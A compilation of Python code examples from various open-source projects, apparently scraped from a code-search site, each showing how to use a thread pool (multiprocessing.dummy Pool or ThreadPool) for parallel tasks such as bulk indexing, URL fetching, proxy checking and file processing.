Code Example #1
def simple_parallel():
    values = [[2, 3, 5], [5, 5, 5], [2], [3, 3]]
    pool = Pool(4)
    results = pool.map(sum, values)
    pool.close()  # closing the pool
    pool.join()  # waiting for the work to finish
    print results
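The same fan-out pattern reads a little tighter with the pool as a context manager (available on Python 3.3+); a minimal sketch, assuming the thread-backed multiprocessing.dummy.Pool used throughout these examples:

from multiprocessing.dummy import Pool  # thread-backed Pool; swap in multiprocessing.Pool for processes

def simple_parallel_py3():
    values = [[2, 3, 5], [5, 5, 5], [2], [3, 3]]
    with Pool(4) as pool:                 # __exit__ terminates the pool for us
        results = pool.map(sum, values)   # blocks until every list is summed
    print(results)                        # [10, 15, 2, 6]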
Code Example #2
File: classes.py Project: MarkoSh/APTester
    def createDemo(self):

        usersData = []
        event = Event()
        pool = ThreadPool(multiprocessing.cpu_count() * 2)
        pool = ThreadPool(5)

        for i in range(0, 1000):
            string = hashlib.sha224()
            string.update('{}'.format(random.random()))
            first = 'first{}'.format(string.hexdigest()[0:10])
            string.update('{}'.format(random.random()))
            last = 'last{}'.format(string.hexdigest()[0:10])
            tel = '{}'.format(8005550000 + i)
            email = 'email{}@localhost.email'.format(string.hexdigest()[0:10])
            postData = {
                    'first': first,
                    'last': last,
                    'tel': tel,
                    'email': email,
                    'pass': '******',
                    'type': 'customer',
                    'event': event
                }
            usersData.append(postData)


        results = pool.map(self.createUser, usersData)
        pool.close()
        pool.join()
Code Example #3
File: helpers.py Project: NoobSkywalker/eve-elastic
def parallel_bulk(client, actions, thread_count=4, chunk_size=500,
        max_chunk_bytes=100 * 1024 * 1024,
        expand_action_callback=expand_action, **kwargs):
    """
    Parallel version of the bulk helper run in multiple threads at once.
    :arg client: instance of :class:`~elasticsearch.Elasticsearch` to use
    :arg actions: iterator containing the actions
    :arg thread_count: size of the threadpool to use for the bulk requests
    :arg chunk_size: number of docs in one chunk sent to es (default: 500)
    :arg max_chunk_bytes: the maximum size of the request in bytes (default: 100MB)
    :arg raise_on_error: raise ``BulkIndexError`` containing errors (as `.errors`)
        from the execution of the last chunk when some occur. By default we raise.
    :arg raise_on_exception: if ``False`` then don't propagate exceptions from
        call to ``bulk`` and just report the items that failed as failed.
    :arg expand_action_callback: callback executed on each action passed in,
        should return a tuple containing the action line and the data line
        (`None` if data line should be omitted).
    """
    # Avoid importing multiprocessing unless parallel_bulk is used
    # to avoid exceptions on restricted environments like App Engine
    from multiprocessing.dummy import Pool
    actions = map(expand_action_callback, actions)

    pool = Pool(thread_count)

    for result in pool.imap(
        lambda chunk: list(_process_bulk_chunk(client, chunk, **kwargs)),
        _chunk_actions(actions, chunk_size, max_chunk_bytes, client.transport.serializer)
    ):
        for item in result:
            yield item

    pool.close()
    pool.join()
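Since parallel_bulk is a generator, nothing is indexed until it is iterated; a minimal usage sketch, assuming a reachable Elasticsearch client and a hypothetical test-index (in the upstream elasticsearch-py helper each yielded item is an (ok, info) tuple):

from elasticsearch import Elasticsearch

client = Elasticsearch()  # assumes a local cluster on the default port
actions = ({"_index": "test-index", "_id": i, "_source": {"value": i}}
           for i in range(1000))

for ok, info in parallel_bulk(client, actions, thread_count=4, chunk_size=250):
    if not ok:                      # draining the generator is what triggers the requests
        print("failed:", info)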
Code Example #4
File: agent.py Project: hit-suit/MNIST
def check_and_rank_ip(session):
    def ping_jd(ip):
        t = time.time()
        try:
            respond = requests.post('http://so.m.jd.com/ware/searchList.action',
                                    data={'_format_': 'json', 'stock': 1, 'page': 1, 'keyword': '手机'},
                                    proxies=ip.to_proxy(), timeout=5).content
            json.loads(respond)
            ip.rank = int(100 * (time.time() - t))
        except Exception:
            ip.rank = None
        return ip

    print datetime.now(), 'start checking proxy IP liveness'
    from multiprocessing.dummy import Pool as ThreadPool
    all_ip = session.query(IP).all()
    pool = ThreadPool(100)
    ips = pool.map(ping_jd, all_ip)
    for ip in ips:
        session.add(ip)
    session.query(IP).filter(IP.rank == None).delete()
    session.commit()
    pool.close()
    pool.join()
    return session.query(IP).count()
Code Example #5
File: perf_test.py Project: Tribushkov/tech-db-api
    def run():
        t = [
            ('users', User().create),
            ('forums', Forum().create),
            ('threads', Thread().create),
            ('posts', Post().create),
            ("followers", User().follow),
            ("subscribptions", Thread().subscribe),
        ]

        for entity, factory in t:
            entities = [True for i in range(int(settings[entity]))]
            num_tasks = len(entities)
            pool = ThreadPool(int(settings['num_threads']))
            try:
                progress = range(5, 105, 5)
                for i, _ in enumerate(pool.imap(factory, entities)):
                    perc = i * 100 / num_tasks
                    if perc % 5 == 0 and perc in progress: 
                        log.print_out('Creating %s: %d%% done' % (entity, perc))
                        progress.remove(perc)
                pool.close()
                pool.join()
            except Exception, e:
                print e
                pool.terminate()
                sys.exit(1)
Code Example #6
File: crysadm_helper.py Project: qq898232/crysadm
def get_offline_user_data():
    if DEBUG_MODE:
        print(datetime.now().strftime('%Y-%m-%d %H:%M:%S'), 'get_offline_user_data')
    if r_session.exists('api_error_info'):
        return

    if datetime.now().minute < 50:
        return

    offline_users = []
    for b_user in r_session.mget(*['user:%s' % name.decode('utf-8') for name in r_session.sdiff('users', *r_session.smembers('global:online.users'))]):
        user_info = json.loads(b_user.decode('utf-8'))

        username = user_info.get('username')

        if not user_info.get('active'): continue

        every_hour_key = 'user:%s:cron_queued' % username
        if r_session.exists(every_hour_key): continue

        offline_users.append(username)

    pool = ThreadPool(processes=5)

    pool.map(get_data, offline_users)
    pool.close()
    pool.join()
Code Example #7
def main():
    dfbToken = raw_input('Enter your Dropbox Business API App token (Team Member File Access permission): ')

    if args.verbose:
        dumpArguments()

    global fileQuota
    fileQuota = args.quota * UNITS[args.units]

    log("Creating Dropbox V2 API Client")
    global dbxApiV2
    dbxApiV2 = DbxApi(DbxApi.DBX_API_V2, dfbToken)

    log("Collecting Member List...")
    members = getDfbMembers(None)
    # Filter out invited members as they can't consume any quota yet
    activeMembers = [member for member in members if member.status != "invited"]
    log("Got {} total team members ({} active, {} suspended, {} invited)"
        .format(
                len(members), len(activeMembers),
                len(getMemberSublist(members, "suspended")),
                len(getMemberSublist(members, "invited"))
                ))

    log("Collecting file quota information - this may take a while...")
    pool = ThreadPool(args.threads)
    members = pool.map(getFileQuotaUsage, activeMembers)
    pool.close()
    pool.join()

    # Write final output
    log("Processing complete, writing output to {}".format(args.output.name))
    dumpCsvFile(members)
Code Example #8
def load_rowdata_to_mongo_zh(is_incremental):
    print("start loading row data(zh) from JSON file to MongoDB...")
    all_start = timeit.default_timer()
    static = Static()
    bydim_dir = static.output_folder + static.dataset_bydim_folder
    
    client = MongoClient(static.mongo_url, static.mongo_port)
    db = client[static.database_name]
    dataset_col = db[static.dataset_col_name]
    if not is_incremental:
        dataset_col.drop()

    file_path_array = []
    for idx, file in enumerate(os.listdir(bydim_dir)):
        file_path = os.path.join(bydim_dir, file)
        if os.path.isfile(file_path):
            file_path_array.append(file_path)
    print(str(len(file_path_array)) + " files are loaded")

    counter = []
    mapfunc = partial(insert_by_dim, counter=counter, dataset_col=dataset_col, all_start=all_start)
    pool = ThreadPool(12)
    pool.map(mapfunc, file_path_array)
    pool.close() 
    pool.join()
    
    print("All the threads are completed. Total number is " + str(len(counter)) + "\n")
    print("total time cost: " + str(round(timeit.default_timer() - all_start)) + 's')
Code Example #9
def run(threads):
    urls = ['http://www.python.org',
    	'http://www.python.org/about/',
    	'http://www.onlamp.com/pub/a/python/2003/04/17/metaclasses.html',
    	'http://www.python.org/doc/',
    	'http://www.python.org/download/',
    	'http://www.python.org/getit/',
    	'http://www.python.org/community/',
    	'https://wiki.python.org/moin/',
    	'http://planet.python.org/',
    	'https://wiki.python.org/moin/LocalUserGroups',
    	'http://www.python.org/psf/',
    	'http://docs.python.org/devguide/',
    	'http://www.python.org/community/awards/'
         ]
    results = []
    scontext = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
    
    requests = [urllib.request.Request(url=url,data=b'None',
                headers={'User-Agent':' Mozilla/5.0 (Windows NT 6.1; WOW64; rv:12.0) Gecko/20100101 Firefox/12.0'})
                for url in urls]
    pool = ThreadPool(threads)    
    results = list(pool.map(lambda x: urllib.request.urlopen(x, context=scontext), requests))
    pool.close()
    pool.join()

    dataLen = [len(result.read().decode('utf-8')) for result in results]
    print(threads, 'thread(s), read', sum(dataLen), 'bytes')
Code Example #10
def parse_films_infomation(item):
    title = item[0]
    title_deal = ''.join(title.split('*'))

    title_deal=''.join(title_deal.split('/'))
    title_deal=''.join(title_deal.split(':'))

    os.mkdir(title_deal)
    os.chdir(title_deal)
    film_info = item[1]
    with open('film_tag.txt', 'w+', encoding='utf-8') as file:
        for i in film_info:
            file.write(i)

    magnent_container = item[3]
    with open('magnent.txt', 'w+', encoding='utf-8') as file2:
        for per_list in magnent_container:
            strings = ''.join(i + '   ' for i in per_list)
            file2.write(strings + '\n')

    # os.mkdir('sample_img')
    # os.chdir('sample_img')

    film_pic_url = item[2]
    sample_images_urls = item[4]

    # print(type(sample_images_urls))

    # set up the thread pool
    child_pool = ThreadPool(12)
    result = child_pool.map(download, sample_images_urls)
    # print('download finished')
    child_pool.close()
    child_pool.join()
    os.chdir('../')
Code Example #11
File: tasks.py Project: likun01/trushwho_wechat
def build_words_weight():
    st = time.time()
    bigvs = BigVs.objects.all()
    def _build(b):
        data = ArticlePostedResults.active_objects.filter(bigv__v_id=b.v_id, is_correct__in=(0, 1)).values('is_correct').annotate(count=Count('is_correct')).order_by('is_correct')
        sum_c , w, c = 0, 0, 0
        for d in data:
            if d['is_correct'] == 1:
                c = d['count']
            sum_c += d['count']
        if sum_c:
            w = c * 1.0 / sum_c
            c = w * 200
            sum_c = 200
        data = Judgement.objects.filter(article__bigv=b, judge__isnull=False).values('judge').annotate(count=Count('judge')).order_by('judge')
        for d in data:
            if d['judge'] == 'right':
                c += d['count']
            sum_c += d['count']
        if sum_c:
            w = int(round(c * 1.0 / sum_c * 100))
            b.words_weight = w
            b.save()
            print b.name, c, sum_c, w
    pool = Pool(8)
    pool.map(_build, bigvs)
    pool.close()
    pool.join()
    ed = time.time()
    debug('build_words_weight', ed - st)
Code Example #12
File: test_graphkit.py Project: yahoo/graphkit
def test_multi_threading():
    import time
    import random
    from multiprocessing.dummy import Pool

    def op_a(a, b):
        time.sleep(random.random()*.02)
        return a+b

    def op_b(c, b):
        time.sleep(random.random()*.02)
        return c+b

    def op_c(a, b):
        time.sleep(random.random()*.02)
        return a*b

    pipeline = compose(name="pipeline", merge=True)(
        operation(name="op_a", needs=['a', 'b'], provides='c')(op_a),
        operation(name="op_b", needs=['c', 'b'], provides='d')(op_b),
        operation(name="op_c", needs=['a', 'b'], provides='e')(op_c),
    )

    def infer(i):
        # data = open("616039-bradpitt.jpg").read()
        outputs = ["c", "d", "e"]
        results = pipeline({"a": 1, "b":2}, outputs)
        assert tuple(sorted(results.keys())) == tuple(sorted(outputs)), (outputs, results)
        return results

    N = 100
    for i in range(20, 200):
        pool = Pool(i)
        pool.map(infer, range(N))
        pool.close()
Code Example #13
File: docs_loader.py Project: grow/grow
    def load(cls, docs, ignore_errors=False):
        """Force load the provided docs to read from file system."""
        if not docs:
            return

        pod = docs[0].pod

        def load_func(doc):
            """Force the doc to read the source file."""
            try:
                # pylint: disable=pointless-statement
                doc.has_serving_path()  # Using doc fields forces file read.
            except document_front_matter.BadFormatError:
                if not ignore_errors:
                    raise

        with pod.profile.timer('DocsLoader.load'):
            if ThreadPool is None or len(docs) < cls.MIN_POOL_COUNT:
                for doc in docs:
                    load_func(doc)
                return
            pool_size = min(cls.MAX_POOL_SIZE, len(docs) * cls.POOL_RATIO)
            pool_size = int(round(pool_size))
            thread_pool = ThreadPool(pool_size)
            results = thread_pool.imap_unordered(load_func, docs)
            # Loop results to make sure that the threads are all processed.
            for _ in results:
                pass
            thread_pool.close()
            thread_pool.join()
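The seemingly empty loop over results is what forces the work: imap_unordered hands back a lazy iterator, and results are only fetched (and worker exceptions re-raised) as it is drained. The same idea in isolation, with a hypothetical load function:

from multiprocessing.dummy import Pool as ThreadPool

def load(doc_id):
    return doc_id * 2          # stand-in for reading a document from disk

thread_pool = ThreadPool(4)
results = thread_pool.imap_unordered(load, range(10))
for _ in results:              # drain the iterator so every task has completed
    pass
thread_pool.close()
thread_pool.join()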
Code Example #14
File: example3.py Project: togear/tools
def Producer():
#    urls = [
#            'http://www.python.org', 
#            'http://www.python.org/about/',
#            'http://www.onlamp.com/pub/a/python/2003/04/17/metaclasses.html',
#            'http://www.python.org/doc/',
#            'http://www.python.org/download/',
#            'http://www.python.org/getit/',
#            'http://www.python.org/community/',
#            'https://wiki.python.org/moin/',
#            'http://planet.python.org/',
#            'https://wiki.python.org/moin/LocalUserGroups',
#            'http://www.python.org/psf/',
#            'http://docs.python.org/devguide/',
#            'http://www.python.org/community/awards/'
#            # etc.. 
#            ]

#            'http://wwww.qq.com','http://www.baidu.com'
    urls = [
            'http://www.taobao.com','http://www.sina.com.cn'
            ]

    start_time = time.time()
    # Make the Pool of workers
    pool = ThreadPool(4) 
    # Open the urls in their own threads
    # and return the results
    results = pool.map(urllib2.urlopen, urls)
    #close the pool and wait for the work to finish 
    pool.close() 
    pool.join()

    print "Done! time Taken()",format(time.time()-start_time)
Code Example #15
File: crysadm_helper.py Project: sykiewang/crysadm
def collect_crystal():
    print(datetime.now().strftime('%Y-%m-%d %H:%M:%S'), 'collect_crystal')
    pool = ThreadPool(processes=5)

    pool.map(check_collect, (json.loads(c.decode('utf-8')) for c in r_session.smembers('global:auto.collect.cookies')))
    pool.close()    
    pool.join()
Code Example #16
File: EvalAnalysis.py Project: UrbanDiver/Poker2
def create_all_preflop_two_hand_equity(verbose=False, save=False, distributed=False, nb_process=4):
	"""returns preflop_two_hand_equity for all two hand preflop combinations"""
	global all_preflop_two_hands

	print '\n--------------- start create_all_preflop_two_hand_equity'
	print 'all preflop two hands = \nstart = {}\nend = {}\nnb of elements = {}'.format(all_preflop_two_hands[:5], all_preflop_two_hands[-5:], len(all_preflop_two_hands))

	t0 = timer()

	if (distributed):
		pool = ThreadPool(nb_process)
		equity = pool.map(preflop_two_hand_equity, all_preflop_two_hands[:])
		pool.close()
		pool.join()
	else:
		equity = []
		for k, p in enumerate(all_preflop_two_hands[:]):
			if (verbose):
				# print k,' - ', p
				sys.stdout.write('\rk=%5d / %5d : %s' % (k+1, len(all_preflop_two_hands), p))
				sys.stdout.flush()
			equity.append(preflop_two_hand_equity(p))

	t1 = timer()
	print 'all_preflop_two_hand_equity time = {:9.4f} s'.format(t1-t0)
	print 'exact number of distinct (rankwise) pairs of preflop hands = {}'.format(np.array([len(e) for e in equity]).sum())
	if (save):
		cPickle.dump(equity, open(os.path.join('Tables', 'all_preflop_two_hand_equity.pk'), 'wb'))
		print '{} saved to disk as {}'.format('equity', os.path.join('Tables', 'all_preflop_two_hand_equity.pk'))
	return equity
Code Example #17
def make_unaligned_fasta(dnaDirectory, groupsDict):
    """ Reads through files in provided directory to find gene sequences that
    match the proteins in the groups dictionary"""
    print "Collecting core genes"
    def make_fasta(group):
        proteins = groupsDict[group]
        out = open('proteinAlignments/' + group + '.fasta', 'w')
        records = []
        seqIDs = []
        for protein in proteins:
            seqID = protein.split('|')[0]
            seqIDs.append(seqID)
            protein = protein.split('|')[1]
            records.append(seqRecordDict[protein])
        SeqIO.write(records, out, 'fasta')
        return seqIDs

    try:
        os.makedirs("proteinAlignments")
    except OSError:
        if not os.path.isdir("proteinAlignments"):
            raise
    files = listdir_fullpath(dnaDirectory)
    seqRecordDict = {}
    seqIDs = []
    for f in files:
        handle = open(f, 'r')
        for record in SeqIO.parse(handle, 'fasta'):
            seqRecordDict[record.id] = record
    pool = ThreadPool(args.threads)
    seqIDs = pool.map(make_fasta, groupsDict.keys())
    pool.close()
    pool.join()
    return seqIDs[0]
Code Example #18
def simTrans(hosts, prm):
	fname = str(prm.n) + 'nodes.' + str(prm.data_size) + 'MB.' + str(prm.pipes) + 'pipes.out'
	for h in hosts:
		full_name = "results/%04d/%s"%(int(h.name.split('h')[1]), fname)
		os.system("rm %s" % full_name)
		status[h.name] = [0 for i in range(prm.pipes)]
		ip[h.name] = h.IP()
		h.cmdPrint('iperf -s -f M >> %s &'%full_name)
	'''for h1 in hosts:
		for h2 in hosts:
			if h1 == h2:
				continue
			print "Testing %s and %s after running server" % (h1.name, h2.name)
			net.iperf( (h1, h2) )
	'''
	print neib
	status['h1'] = [2 for i in range(prm.pipes)]	#start node
	print status
	k = []
	for h in hosts:
		k.append((h, prm))
	pool = ThreadPool(50)
	pool.map(perNodeProc, k)
	pool.close()
	pool.join()

	for h in hosts:
		h.cmdPrint('kill %iperf')
Code Example #19
File: scrape_projects.py Project: mansam/fossbox
def grab_everything():
    node_links = grab_blog_node_links()
    pool = ThreadPool(cpu_count())
    results = pool.map(grab_blog_content, node_links)
    pool.close()
    pool.join()
    return results
Code Example #20
File: nrkdl.py Project: esp0/nrkdl
def _download_all(items):
    """Async download of the files.

       Example: [(url, quality, file_path)]

    """

    global WORKERS
    # Don't start more workers than 1:1
    if WORKERS < len(items):
        WORKERS = len(items)

    pool = ThreadPool(WORKERS)
    chunks = 1  # TODO
    # 1 ffmpeg is normally 10x- 20x * 2500kbits ish
    # so depending on how many items you download and
    # your bandwidth you might need to tweak chunk

    results = pool.imap_unordered(dl, items, chunks)
    try:
        for j in tqdm.tqdm(results, total=len(items)):
            pass
    finally:
        pool.close()
        pool.join()
Code Example #21
def dns_resolver(filename, dst="mail.txt"):
    try:
        fd = open(filename, 'r')
    except:
        print 'can not open the file:', filename
        return

    try:
        fd_write = open(dst,'w')
    except:
        print 'error in open',dst
        return 

    thread_num = 2
    pool = ThreadPool(thread_num)
    results = pool.map(verify_domain,fd.readlines())
    pool.close()
    pool.join()
    results = list(set(results))
    results = [item for item in results if item]
    

    for line in results:
        fd_write.write(line)

    fd_write.close()
Code Example #22
File: checklinks.py Project: colutti/LinksChecker
def main():
    parser = argparse.ArgumentParser(description='Checks a LegalOne application for broken links')
    parser.add_argument('-d', '--domain',
                        help='URL to check for broken links. Ex. http://colucci.release.dco.novajus.com.br',
                        required=True)
    parser.add_argument("-e", '--escritorio',
                        help='Account to check for broken links, Ex. xxxx, where xxx.release.dco.novajus.com.br',
                        required=True)
    parser.add_argument("-l", '--loginpage',
                        help='URL to login on the application. Ex. http://release.dco.novajus.com.br/conta/login',
                        required=True)
    parser.add_argument("-t", '--threads',
                        type=int,
                        help='How many threads searching for broken links at the same time. Default is 10',
                        required=False, default=10)
    args = parser.parse_args()
    loginpage = args.loginpage
    escritorio = args.escritorio
    domain = args.domain
    threads = args.threads
    pages_to_test = queue.Queue(maxsize=0)
    cookie_login = login(domain, escritorio, loginpage)
    pages_to_test.put(domain + "/contatos/contatos/search")
    test_url(cookie_login, pages_to_test, domain, pages_to_test.get())
    while not pages_to_test.empty():
        pool = ThreadPool(threads)
        links_to_check = []
        for x in range(0, threads):
            links_to_check.append(pages_to_test.get())
        partialtest_url = partial(test_url, cookie_login, pages_to_test, domain)
        pool.map(partialtest_url, links_to_check)
        pool.close()
        pool.join()
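pool.map passes exactly one argument per call, which is why the fixed arguments (cookie_login, pages_to_test, domain) are bound up front with functools.partial. The same trick in isolation, with hypothetical names:

from functools import partial
from multiprocessing.dummy import Pool as ThreadPool

def fetch(session, base_url, path):
    return '{}{} via {}'.format(base_url, path, session)

bound = partial(fetch, 'session-1', 'http://example.com')  # fix the first two arguments
pool = ThreadPool(4)
print(pool.map(bound, ['/a', '/b', '/c']))                 # workers supply only the varying path
pool.close()
pool.join()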
Code Example #23
def main():
    parser = argparse.ArgumentParser(usage='%(prog)s [options] SERVER_URL',
                                     description=__doc__)
    parser.add_argument(
        '-t', '--threads',
        help='Number of threads (simultaneous connections)',
        dest='threads', default=1, type=int)
    parser.add_argument('server', help='URL of server')
    args = parser.parse_args()

    server = args.server

    if not server.startswith('http://'):
        server = 'http://{}'.format(server)

    icons = []
    for font_id, font in fonts.items():
        for char in font['characters']:
            url = os.path.join(server, 'icon', font_id, '000', char)
            icons.append((font_id, char, url))

    icons.sort()

    print('{} icons to test on {} ...'.format(len(icons), args.server))

    if MAX_ICONS:
        icons = icons[:MAX_ICONS]

    pool = Pool(args.threads)
    pool.map(check_icon, icons)
    pool.close()
    pool.join()
Code Example #24
File: ePy_MC.py Project: taotheadmin/ePy_Bench
def e_cal(l, cores):
    global LOOPS
    '''
    e calculator
    This function receives the number of digits of precision,
    calculates e, and prints progress while working.

    It returns the value of e.
    '''
    p = Pool()
    getcontext().prec = l
    e = Decimal(0)
    i = 0
    temp = 0
    c = 0
    while True:
        fact = p.map(math.factorial, range(i, i+cores)) #parallel process factorial
        e += sum(p.map(one_div, fact)) #processed factorial will total in here
        i += cores
        c += 1
        LOOPS += 1
        sys.stdout.write("\r%i loops passed." % (c) ) #Print Loop status
        sys.stdout.flush()
        #print i, "loops passed."
        if e == temp:
            break
        temp = e
    sys.stdout.write("\r%i loops passed.\n" % (c) )
    print i
    p.close()
    p.join()

    return e
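The loop accumulates the series e = 1/0! + 1/1! + 1/2! + ... and stops once another block of terms no longer changes the Decimal value at the requested precision. A small single-threaded reference for the same series, useful for sanity-checking the pooled version (hypothetical helper):

from decimal import Decimal, getcontext

def e_reference(digits):
    getcontext().prec = digits
    e, term, n = Decimal(1), Decimal(1), 1
    while True:
        term /= n              # term is now 1/n!
        if e + term == e:      # adding further terms no longer changes the value
            return e
        e += term
        n += 1

print(e_reference(30))         # ~2.7182818284590452353602874713...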
Code Example #25
File: block-ip.py Project: rlemm-juniper/block-ip
def multiRunuser():
    pool = ThreadPool(cpu_count() * 8)
    global ip_list
    global results
    results = pool.map_async(runuser, ip_list)
    pool.close()
    pool.join()
Code Example #26
File: credstash.py Project: fugue/credstash
def getAllSecrets(version="", region=None, table="credential-store",
                  context=None, credential=None, session=None, **kwargs):
    '''
    fetch and decrypt all secrets
    '''
    if session is None:
        session = get_session(**kwargs)
    dynamodb = session.resource('dynamodb', region_name=region)
    kms = session.client('kms', region_name=region)
    secrets = listSecrets(region, table, **kwargs)

    # Only return the secrets that match the pattern in `credential`
    # This already works out of the box with the CLI get action,
    # but that action doesn't support wildcards when using as library
    if credential and WILDCARD_CHAR in credential:
        names = set(expand_wildcard(credential,
                                    [x["name"]
                                     for x in secrets]))
    else:
        names = set(x["name"] for x in secrets)

    pool = ThreadPool(min(len(names), THREAD_POOL_MAX_SIZE))
    results = pool.map(
        lambda credential: getSecret(credential, version, region, table, context, dynamodb, kms, **kwargs),
        names)
    pool.close()
    pool.join()
    return dict(zip(names, results))
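The closing dict(zip(names, results)) works because Pool.map returns results in the same order as its input, even though the threads finish in arbitrary order. A tiny sketch of that ordering guarantee:

from multiprocessing.dummy import Pool

names = ['alpha', 'beta', 'gamma']
pool = Pool(2)
lengths = pool.map(len, names)       # results come back in input order
pool.close()
pool.join()
print(dict(zip(names, lengths)))     # {'alpha': 5, 'beta': 4, 'gamma': 5}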
Code Example #27
File: eval_duration.py Project: dyan0123/Utils
def eval_dir(fn, files_list):
	pool = ThreadPool(WORKER_NUM)
	results = pool.map(fn, files_list)
	# close the pool and wait for the work to finish
	pool.close()
	pool.join()
	return sum(results)
Code Example #28
File: proxy.py Project: bubble1229/proxy_pool
    def get_proxy(self):
        self._parse_proxy()
        pool = ThreadPool(8)
        pool.map(self._check_proxy, self.proxies)
        pool.close()
        pool.join()
        return self.checked_proxies
Code Example #29
File: is_proxy_ok.py Project: shengqi158/is_proxy_ok
def get_proxys(file_name, thread_num=5):
    """这里的文件内容可以是从cn-proxy.com复制过来的数据"""
    proxys = []
    ip_reg = re.compile(r'^\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}', re.I)
    try:
        with open(file_name, 'r') as fd_proxy:
            for line in fd_proxy:
                if line and line.strip():
                    print 'line',line.strip()
                    if ip_reg.match(line.strip()):
                        ip, port = line.strip().split()[0], line.strip().split()[1]
                        proxy = '%s:%s' %(ip, port)
                        print 'proxy',proxy
#                        if test_connection(proxy):
                        if proxy:
                            proxys.append(proxy)
        pool = ThreadPool(thread_num)
        results = pool.map(test_connection,proxys)
        pool.close()
        pool.join()
        
        proxys = list(set(results))
        proxys = sorted(proxys,key=lambda x:x.split(".")[0])
    
    except Exception,e:
        print 'error',e
Code Example #30
def parallel_runner(args):
    pool = ThreadPool(args.parallel)
    map_args = map(lambda f: (args, f), args.file)
    result = pool.map(run_cmd, map_args)
    pool.close()
    pool.join()
    print result
Code Example #31
def make_unaln_files (search_dir, best_extension, cutoff,
                      dbpath, outdir, outext, force=False,
                      index_type="sfetch",
                      threads=2,multi=False):
    orthologs = {}
    dbidx = ""
    index_type = index_type.lower()
    if index_type == "cdbfasta":
        dbidx = dbpath + CDBYANKEXT
    elif index_type == "sfetch":
        dbidx = dbpath + SFETCHEXT

    if not os.path.exists(outdir):
        os.makedirs(outdir)

    if not os.path.exists(dbidx):
        print("No dbidx %s exists for reading" % (dbidx))
        return -1

    for file in os.listdir(search_dir):

        if file.endswith("."+best_extension):
            with open(os.path.join(search_dir,file),"r") as fh:
                for line in fh:
                    row = line.strip().split("\t")
                    HMMname = row.pop(0) # take first col as HMM name

                    if best_extension == "best":
                        if float(row[1]) <= float(cutoff):
                            if HMMname in orthologs:
                                orthologs[HMMname].append(row[0])
                            else:
                                orthologs[HMMname] = [ row[0] ]
                    elif best_extension == "best_multi":
                        if not multi:
                            row = [ row[0] ]

                        for hit in row:
                            hit_dat = hit.split(",")

                            if HMMname in orthologs:
                                orthologs[HMMname].append(hit_dat[0])
                            else:
                                orthologs[HMMname] = [ hit_dat[0] ]

    pool = ThreadPool(threads)
    fileset = []
    for orth in orthologs:
        outfile = "%s.%s" % (os.path.join(outdir,orth),outext)
        if force or (not os.path.exists(outfile)):
            if len(orthologs[orth]) >= Min_taxa:
                fileset.append( [dbpath, outfile,"\n".join(orthologs[orth]) + "\n"])

    if index_type == "cdbfasta":
        results = pool.map(run_cdbyank, fileset)
    elif index_type == "sfetch":
        results = pool.map(run_sfetch, fileset)

    # close the pool and wait for the work to finish
    pool.close()
    pool.join()
Code Example #32
        run_result = automata_run_stat(atm=atm, file_path=input_path[uat], cycle_detail=True, report_detail=False, bytes_per_dim=1)
        real_final.append(run_result[total_reports])
        appr_run_result = automata_run_stat(atm=appr_automata, file_path=input_path[uat], cycle_detail=True, report_detail=False, bytes_per_dim=1,
                                       translation_dic=translation_dic)
        approximate_final.append(appr_run_result[total_reports])

        with open(str(uat) + '.ttxt', "a") as f:
            print >> f, "real reports: " + str(real_final[-1])
            print >> f, "approximate reports: " + str(approximate_final[-1])
            print >> f, "real nodes count: " + str(atm.nodes_count)
            print >> f, "approximate nodes count:" + str(appr_automata.nodes_count)
            print >>f, "----------------------------------------------------------------"


    with open(str(uat) + '.ttxt', "a") as f:
        print >>f, "***************sum*******************"
        print >>f, "real reports: " + str(sum(real_final))
        print >>f, "approximate reports: " + str(sum(approximate_final))
        print >>f, "real nodes count: " + str(real_states)
        print >>f, "approximate nodes count:" + str(appr_states)

if __name__ == '__main__':

    ds = [a for a in AnmalZoo]
    thread_count = 8

    t_pool = ThreadPool(thread_count)
    results = t_pool.map(process_single_ds, ds)
    t_pool.close()
    t_pool.join()
Code Example #33
    # Get a Virtual Network context by Name
    print('\n====> Get a Virtual Network Context by Name: {}'.format(vnname))
    print(json.dumps(dnac.get_virtual_network_by_name(vnname), indent=2))

    # Get a Virtual Network context by Id
    vnid = dnac.get_virtual_network_id(vnname)
    print('\n====> Get a Virtual Network Context by Id: {}'.format(vnid, vnname))
    print(json.dumps(dnac.get_virtual_network_by_id(vnid), indent=2))

    # Delete a Virtual Network context
    print('\n==== Deleting Virtual Network: {} ===='.format(vnname))
    response = dnac.delete_virtual_network_by_name(vnname, asynch=False)
    print(json.dumps(response, indent=2))

    # Get a Virtual Network context ID given its name
    vnname = 'INFRA_VN'
    print('\n====> Get a Virtual Network Context ID given its name:')
    print('Virtual Network context Name: {}'.format(vnname))
    print('Virtual Network context ID: {}'.format(dnac.get_virtual_network_id(vnname)))

    # Multi-threading
    pool = Pool(4)
    thread_timeout = 8640
    operations = []
    operations.append((dnac.exists_virtual_network, {'vn_name': vnname}))
    data = pool.map_async(utils.run_workers, operations).get(thread_timeout)
    pool.close()
    pool.join()
    print(data)
Code Example #34
File: bsdiff_chunk.py Project: sorphin/main
    def diff(self, from_file, to_file, out_file, log_file):
        """
            Split binaries in chunks, diff each chunk and generate a file with
            all chunks (binary patch, compressed or empty)
        """

        out_dir = os.path.dirname(out_file)

        try:
            os.stat(out_dir)
        except:
            os.mkdir(out_dir)

        with open(to_file, 'rb') as t, open(from_file, 'rb') as f:

            from_mmap = mmap.mmap(f.fileno(), 0, prot=mmap.PROT_READ)
            to_mmap = mmap.mmap(t.fileno(), 0, prot=mmap.PROT_READ)

            from_len = from_mmap.size()
            assert from_len != 0

            to_len = to_mmap.size()
            assert to_len != 0

            from_hash = sha256(from_mmap).digest()
            to_hash = sha256(to_mmap).digest()

            assert from_hash != to_hash

            from_list = list(self._chunk(from_mmap))
            to_list = list(self._chunk(to_mmap))

            if self.verbose:
                print "Using %d threads" % (self.threads)

            pool = ThreadPool(multiprocessing.cpu_count())

            oss = list()
            tss = list()
            xxx = list()

            for x in range(0, len(to_list)):

                try:
                    o = from_list[x]
                except IndexError:
                    o = list()

                try:
                    t = to_list[x]
                except IndexError:
                    t = list()

                oss.append(o)
                tss.append(t)
                xxx.append(x)

            results = pool.map(self._diff_with_exception, zip(oss, tss, xxx))
            pool.close()
            pool.join()

            out_fd = open(out_file, "wb")
            total_bytes = 0

            patch_information = {}
            patch_information["chunks"] = {}

            for result in results:
                patch_information["chunks"]["%d" % result.get("_id")] = result
                if result["_type"] > CHUNK_TYPE_KEEP:
                    in_fd = open(
